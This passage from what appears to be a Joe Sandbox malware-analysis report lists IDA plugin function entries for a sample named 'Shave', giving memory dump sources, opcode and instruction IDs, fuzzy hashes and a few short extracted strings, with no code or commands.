                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1bb29da278f9f26503860115a87ba641af4220bcf1952a95901048230bc00187
                                                                                                                                • Instruction ID: 84e5c2a5eaa7459c1cacc778884d583a93f28d0e26012f43d5ed50a51a198e16
                                                                                                                                • Opcode Fuzzy Hash: 1bb29da278f9f26503860115a87ba641af4220bcf1952a95901048230bc00187
                                                                                                                                • Instruction Fuzzy Hash: D8A1D474D002088FEB14DFA9C984BDDBBB1FF89304F208269E409AB3A5DB759985CF51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1ab6f4bfe995b29dd4e9947addb94804bb7a0832bc03b8572d1a22526d02dc62
                                                                                                                                • Instruction ID: 5e494fa40d969849b6f6a4960ba7a9a3ee5781d0af49d9441ff58e07f068058b
                                                                                                                                • Opcode Fuzzy Hash: 1ab6f4bfe995b29dd4e9947addb94804bb7a0832bc03b8572d1a22526d02dc62
                                                                                                                                • Instruction Fuzzy Hash: 5191C074D04208CFEB14EFA8C984BDDBBB1BF89314F209669E409AB391DB759985CF11
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 099f2542f820e4b121d70817ce27428efda3a9be8271e5c2d6e0bf0e9ea501f1
                                                                                                                                • Instruction ID: 0bd76bc653441cee079d34fc883c7a87a95491b0906b2e9dd371f02b31a04b26
                                                                                                                                • Opcode Fuzzy Hash: 099f2542f820e4b121d70817ce27428efda3a9be8271e5c2d6e0bf0e9ea501f1
                                                                                                                                • Instruction Fuzzy Hash: F381B274E00218CFDB08EFA9D980AEDBBB2BF88700F608129D815BB355DB759946CF54
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279584649.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b50000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 48a2984ac16612ff60aac0d99afe626a08fe8d0a95145ac371a24e93cc08867d
                                                                                                                                • Instruction ID: 842c196b43bc37f64c1b8e41b6dd2ecd45317e0609d08db87ee29c28e6bbd727
                                                                                                                                • Opcode Fuzzy Hash: 48a2984ac16612ff60aac0d99afe626a08fe8d0a95145ac371a24e93cc08867d
                                                                                                                                • Instruction Fuzzy Hash: F181B274E00218CFDB18DFA9C984BADBBB2BF88300F208169D815BB365DB359946CF54
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279803869.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4e40000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: bf80166743ae77fa0833012d82c884be310973446cbfb29601f8fb2ffe74c5dd
                                                                                                                                • Instruction ID: 3dab587ce9c4f8164998282beadb82ac4835489b529821b16675c46b16fc35db
                                                                                                                                • Opcode Fuzzy Hash: bf80166743ae77fa0833012d82c884be310973446cbfb29601f8fb2ffe74c5dd
                                                                                                                                • Instruction Fuzzy Hash: C281C478E00218CFDB18DFA9D994AEDBBB2BF88304F208129D815BB355DB356946CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279803869.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4e40000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: debe244362435f83b4ae5fadcbf67c3bc293f6e331b87438396a392db662e2ac
                                                                                                                                • Instruction ID: e804c1ac8ddf41463d4d517c1722e910bc6fe97869c5783ba41513aa78f100a6
                                                                                                                                • Opcode Fuzzy Hash: debe244362435f83b4ae5fadcbf67c3bc293f6e331b87438396a392db662e2ac
                                                                                                                                • Instruction Fuzzy Hash: 5D81C274E00218CFDB08DFA9D990AEDBBB2BF88700F208129D815BB355DB35A946CF54
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3301681538.00000000379F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 379F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_379f0000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 249387c9b8dc972b826fa42825fcce8acf28e0326b03f3f3fb81990d53ff0113
                                                                                                                                • Instruction ID: 26c15c3c7b63fe2f6f7f12d0ec26dd9619f5ece47adff6e3896bac89dc37b5ec
                                                                                                                                • Opcode Fuzzy Hash: 249387c9b8dc972b826fa42825fcce8acf28e0326b03f3f3fb81990d53ff0113
                                                                                                                                • Instruction Fuzzy Hash: 8171A4B5E016198FEB68CF6AC944B9EFBF2BF88304F14C1A9D409A7254DB744A85CF11
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3301681538.00000000379F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 379F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_379f0000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9ee07db7cf1626fe93721e1cb5c91f7088c0eb4fc9eb0259d3870b5cf914a965
                                                                                                                                • Instruction ID: eff13c7e36b13c48e97cd822d9b2dec238b9257ead4dd1d7f99acddacff5b95b
                                                                                                                                • Opcode Fuzzy Hash: 9ee07db7cf1626fe93721e1cb5c91f7088c0eb4fc9eb0259d3870b5cf914a965
                                                                                                                                • Instruction Fuzzy Hash: 4771B4B5E016198FEB28CF6AC944B9DFBF2BF88304F14C1A9D408A7254DB744A85CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 78aadb4219213a4d39897d28f43de88bb5bbc908e1f2dd2cf72f42803f7caa76
                                                                                                                                • Instruction ID: 0e2122fe3621e5933eff46eebd7381eb37f136c8d30f45529ca159fe18ebf82d
                                                                                                                                • Opcode Fuzzy Hash: 78aadb4219213a4d39897d28f43de88bb5bbc908e1f2dd2cf72f42803f7caa76
                                                                                                                                • Instruction Fuzzy Hash: 957194B5E016188FEB68DF66C944BDEBBF2AF88300F14C1AAD409A7254DB744A85CF11
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 85ac991e0d56ff3d4e355eb980b793af9b06e95f0f2ad4781f3e974de925cd81
                                                                                                                                • Instruction ID: ceb4137e6f4f319b404716eef9ce6f62afe6028d0357204505f7ce4702bd8058
                                                                                                                                • Opcode Fuzzy Hash: 85ac991e0d56ff3d4e355eb980b793af9b06e95f0f2ad4781f3e974de925cd81
                                                                                                                                • Instruction Fuzzy Hash: 7151B674E00208DFDB08DFBAD944A9DBBF6BF89301F248029E815AB365DB345946CF54
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: bcf142b66f74c358b7f015b99e899a9ac60bcdf00870111bbab966242d51cff9
                                                                                                                                • Instruction ID: a06b87aa2f8b03d3517f9cf4b21a63d1637f81fe92e4c4bd88ce72ba3108fe7b
                                                                                                                                • Opcode Fuzzy Hash: bcf142b66f74c358b7f015b99e899a9ac60bcdf00870111bbab966242d51cff9
                                                                                                                                • Instruction Fuzzy Hash: 7551B574E00308DFDB08DFAAD984A9DBBF6BF88300F208029E819AB365DB345945CF54
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279546991.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b30000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 584dd16b12d13cab1a71f031f54bc1f37ceefffe791cce1f01bd769d3b2ae2b7
                                                                                                                                • Instruction ID: fbd07099b2d54815787e6a9294a4c3629791a845d6fe6cab1b8cfecbd82339b9
                                                                                                                                • Opcode Fuzzy Hash: 584dd16b12d13cab1a71f031f54bc1f37ceefffe791cce1f01bd769d3b2ae2b7
                                                                                                                                • Instruction Fuzzy Hash: 6241E2B0D016089BEB28DFAAD8447DDBBF2AF88304F24C169D418BB295DB755946CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3301681538.00000000379F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 379F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_379f0000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 135314b6a4caf8c3d2bae94700573a66600fa35921315f6bdaf6506c97718fd3
                                                                                                                                • Instruction ID: e2d3820718af19375ed6a02201e1720855540cdf1066b685af347445a170c9df
                                                                                                                                • Opcode Fuzzy Hash: 135314b6a4caf8c3d2bae94700573a66600fa35921315f6bdaf6506c97718fd3
                                                                                                                                • Instruction Fuzzy Hash: C44166B1E016198BEB28CF57C8447DEFAF3AFC9204F14C1B9C40CA6264EB744A868F51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279490786.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b00000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 11eaa0e7bc0c96f67030587ba324737b3de7df65ee50703943c2dc2bb9e2a80c
                                                                                                                                • Instruction ID: 4e539e0d6ad98dd35c2077bea7bb064a47faca2c33d85d37f73c592f58df6023
                                                                                                                                • Opcode Fuzzy Hash: 11eaa0e7bc0c96f67030587ba324737b3de7df65ee50703943c2dc2bb9e2a80c
                                                                                                                                • Instruction Fuzzy Hash: F441C2B0D002088BEB18DFAAD8547DDFBF2AF89304F14C16AD418BB290EB755946CF14
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3301681538.00000000379F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 379F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_379f0000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b8074930cbe9869181f90b6c5f996aa8a5676b764f96df6519c84c9fb2015c02
                                                                                                                                • Instruction ID: 67d775324159f8dec37d123cbe51193560fb67d80be7b563f35d09349636dbdc
                                                                                                                                • Opcode Fuzzy Hash: b8074930cbe9869181f90b6c5f996aa8a5676b764f96df6519c84c9fb2015c02
                                                                                                                                • Instruction Fuzzy Hash: 36417AB1E016198BEB58CF5BC9447DEFAF3AFC8214F14C1A9C40CB6254DB740A868F51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6bfb0362205a8f061ddb3a82a83511b1ce7ea5454133ba390662b09d12ebf880
                                                                                                                                • Instruction ID: e20c2b856d9e38d31a77d74576ed2322d120e0d635723c5f59e46dae9146de70
                                                                                                                                • Opcode Fuzzy Hash: 6bfb0362205a8f061ddb3a82a83511b1ce7ea5454133ba390662b09d12ebf880
                                                                                                                                • Instruction Fuzzy Hash: 244159B1E016588BEB58CF67C9447DEFAF3AFC9304F14C1AAC50CA6264DB750A868F51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3301681538.00000000379F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 379F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_379f0000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7604e6316e9665adfb08807f5b8e747d86822e3a9d4e59feaa17a69d5ad3019e
                                                                                                                                • Instruction ID: 14542261c9d34040aa5bacd6a404a49acf38efc20eb23895f4795d6a7e6354a2
                                                                                                                                • Opcode Fuzzy Hash: 7604e6316e9665adfb08807f5b8e747d86822e3a9d4e59feaa17a69d5ad3019e
                                                                                                                                • Instruction Fuzzy Hash: 334158B5E016188BEB58CF5BC9447DEFAF3AFC9304F14C1AAC50CA6254EB750A868F51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279490786.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b00000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ec325da7067e0e4cb7a6f7b78215717d0934115ed4c88a19eed2f80dfc1ae47a
                                                                                                                                • Instruction ID: 2a0e0d32b8fcf0f72e44a081fc129980cdbd8e96c43289f462285d3f18c4b8c1
                                                                                                                                • Opcode Fuzzy Hash: ec325da7067e0e4cb7a6f7b78215717d0934115ed4c88a19eed2f80dfc1ae47a
                                                                                                                                • Instruction Fuzzy Hash: E341E574E016488BDB08DFAAD8846DDBBF2FF88304F20C12AC419BB294EB745946CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279490786.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b00000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: fc0b10915f92369587e9a2d15c3f60848a7c042c9e7d0a972d4ac55535905916
                                                                                                                                • Instruction ID: a4d7e6369a517a2ea6bd1f03ceb09b19d12e676158acd67271eae4f893011f30
                                                                                                                                • Opcode Fuzzy Hash: fc0b10915f92369587e9a2d15c3f60848a7c042c9e7d0a972d4ac55535905916
                                                                                                                                • Instruction Fuzzy Hash: 8141B2B0D006088BDB18DFAAC8547DDBBF2BF89315F14C16AC428BB290EB755946CF54
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3301681538.00000000379F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 379F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_379f0000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d5f326469d34845d92e98911a3a40f11730baaa07b0768a9d63745f4a6671a31
                                                                                                                                • Instruction ID: 170f2454e5c1a759b3a06f91e90df9c09fc6ab6a8e2164d7ab965c751aa8c0cb
                                                                                                                                • Opcode Fuzzy Hash: d5f326469d34845d92e98911a3a40f11730baaa07b0768a9d63745f4a6671a31
                                                                                                                                • Instruction Fuzzy Hash: D24159B1E016598BEB58CF6BC9447DEFAF3AFC9204F14C1AAC40CA6254DB750A858F51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279546991.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b30000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 72cae269b964b2b8696e2f9a723682944a4b1ed78787065bfe7aa65b530db161
                                                                                                                                • Instruction ID: aac99449889fe5e2e2f6dc9877419f622bbf78806f3447b2d0c138b7d54c506a
                                                                                                                                • Opcode Fuzzy Hash: 72cae269b964b2b8696e2f9a723682944a4b1ed78787065bfe7aa65b530db161
                                                                                                                                • Instruction Fuzzy Hash: C9410574E002188BEB19DFAAD9547DDBBF2BF89304F24D069D419BB254EB346906CF00
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3301681538.00000000379F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 379F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_379f0000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ba105648afbbc5a3dffa15d2b62d6005c063f2f1af7bd0f555c68993a8621eb3
                                                                                                                                • Instruction ID: 790d52d4065d0e2d4541fe9bd5087cdd8c79acac1daf6dfc013a45198826152a
                                                                                                                                • Opcode Fuzzy Hash: ba105648afbbc5a3dffa15d2b62d6005c063f2f1af7bd0f555c68993a8621eb3
                                                                                                                                • Instruction Fuzzy Hash: 84417C71D016188BEB58CF67C9447DEFAF3AFC9304F14C1AAC40CA6254DB750A858F51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279546991.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b30000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a78002b1858ea4afe0405bc671a627dbbae1e46bcc0bda177c212ff65c92ffb3
                                                                                                                                • Instruction ID: 7ec111006b6de3d1d9c1ff269b25af9c1f9889dcd9e4faab641d3101383164fe
                                                                                                                                • Opcode Fuzzy Hash: a78002b1858ea4afe0405bc671a627dbbae1e46bcc0bda177c212ff65c92ffb3
                                                                                                                                • Instruction Fuzzy Hash: F241F174E002588BDB18DFAAD8947DEBBF2BF89300F20D16AC418BB255EB345946CF40
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279490786.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b00000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 66b4e4d949f41cfa2b87980e748822e1163944c2ff782a18ca3cd16f2aeb0c63
                                                                                                                                • Instruction ID: b966be153140b9ddb23552ecfce362b4804c4bfc7fa719677d3ff8166df6f2d1
                                                                                                                                • Opcode Fuzzy Hash: 66b4e4d949f41cfa2b87980e748822e1163944c2ff782a18ca3cd16f2aeb0c63
                                                                                                                                • Instruction Fuzzy Hash: 7E41D7B4E012488BDB08DFAAD8506DDFBF2AF89304F20C129D419BB255EB355946CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279803869.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4e40000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7358dd75dd0750aa2f8fa0fd07b74f006bcd276f805dbacc3f46f41f44376983
                                                                                                                                • Instruction ID: 79804fa2684d885e7950ed466a12e4c2558be89c2f03976243f5708b5fa475ce
                                                                                                                                • Opcode Fuzzy Hash: 7358dd75dd0750aa2f8fa0fd07b74f006bcd276f805dbacc3f46f41f44376983
                                                                                                                                • Instruction Fuzzy Hash: E241F2B4E002188BDB18DFAAD8546DEFBF2BF89300F24D16AD518BB255EB345946CF40
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e83371febaaa5c1b88b77623961bc407685bc9d5389b998b253a815846056720
                                                                                                                                • Instruction ID: 0262f19b5e208e3ffa38aa25719122758953ff291348eb33b44c32adfa289477
                                                                                                                                • Opcode Fuzzy Hash: e83371febaaa5c1b88b77623961bc407685bc9d5389b998b253a815846056720
                                                                                                                                • Instruction Fuzzy Hash: 7C41E274D01248CBEB18DFAAC8506EEBBF2AF89300F24D12AC418BB359DB755946CF00
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0da7162e02a788b8ca80135ea315de777750b2466053b74d4e4615536cd5fa99
                                                                                                                                • Instruction ID: e9dfc731b4c1668ee108769f7e4bce41bd6d3d07362489c77f51ca345b7104c4
                                                                                                                                • Opcode Fuzzy Hash: 0da7162e02a788b8ca80135ea315de777750b2466053b74d4e4615536cd5fa99
                                                                                                                                • Instruction Fuzzy Hash: 7E41C1B4E01248CBEB18DFAAD9506DDBBF2AF89300F20D12AD418BB355DB355946CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 94ab3b6cab31a6cefd33ad1d76f4656dde45835238e46b045dc89050d4b9f984
                                                                                                                                • Instruction ID: 32e07244292284a1f78f3340935b109de26350c12c1e1cf3d2f1bc7b638f4243
                                                                                                                                • Opcode Fuzzy Hash: 94ab3b6cab31a6cefd33ad1d76f4656dde45835238e46b045dc89050d4b9f984
                                                                                                                                • Instruction Fuzzy Hash: DE31B2B5E01208CBEB08DFAAD8416DDBBB2AF89300F24D12AC418BB355DB359946CF50
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
                                                                                                                                • API String ID: 0-1435242062
                                                                                                                                • Opcode ID: 2c79297187aa04342b964b6c6e5020d6dd979fa85b1a0ad6a4cbf481b759efee
                                                                                                                                • Instruction ID: 80a77326c0df9e9c3ab57840dbd50335698a706b535da10f8b942afe87097d08
                                                                                                                                • Opcode Fuzzy Hash: 2c79297187aa04342b964b6c6e5020d6dd979fa85b1a0ad6a4cbf481b759efee
                                                                                                                                • Instruction Fuzzy Hash: 95128E30A04205CFCB15CF68E985A9EBBF1FF49315F148599E869DB2A1D730ED49CB50
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 8bq$Haq$Haq$Haq$TJbq
                                                                                                                                • API String ID: 0-1597716666
                                                                                                                                • Opcode ID: 0834c4c59148c8a28da9c119c0398a8a9f083009208a386d9f4a07ebdcaa1d8e
                                                                                                                                • Instruction ID: b8db7c68f9443850327362ed9220cb7e88ed461b6933b1ae61bd513131f258fb
                                                                                                                                • Opcode Fuzzy Hash: 0834c4c59148c8a28da9c119c0398a8a9f083009208a386d9f4a07ebdcaa1d8e
                                                                                                                                • Instruction Fuzzy Hash: 9AD1D334B442048FDB08EF68C491AAEBBB7FF89720F144566E505DB3A1CA35DE46CB91
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $Haq$Haq$Haq
                                                                                                                                • API String ID: 0-432640594
                                                                                                                                • Opcode ID: 54a5098ce21dc0c23e228d011d4c3afe8dba71e8c19e3b976600d58b89296681
                                                                                                                                • Instruction ID: 858f9d5f51a4f4ddb09404f8260ddbea5a198db40ba9dcb537ccc836b8112db4
                                                                                                                                • Opcode Fuzzy Hash: 54a5098ce21dc0c23e228d011d4c3afe8dba71e8c19e3b976600d58b89296681
                                                                                                                                • Instruction Fuzzy Hash: 9381E734B44304DFDB196F38945526E3AA6EFC5761F208229E8169B3D1DF398D42CB92
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279490786.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b00000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: D@$D@$D@
                                                                                                                                • API String ID: 0-3330130650
                                                                                                                                • Opcode ID: 24302b3c7e3e2ec31657ee40cf475ed9de119024a0b9e0447d739c635d274a7b
                                                                                                                                • Instruction ID: 173192cfe9937fe14d02b96031f006e78cd61c82c99d34ca35ef5818752bbd5b
                                                                                                                                • Opcode Fuzzy Hash: 24302b3c7e3e2ec31657ee40cf475ed9de119024a0b9e0447d739c635d274a7b
                                                                                                                                • Instruction Fuzzy Hash: C8C1AF74E002298FDB64DF68C855BDEBBB2BB88300F1081E9D50DA7291DB746E85DF50
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
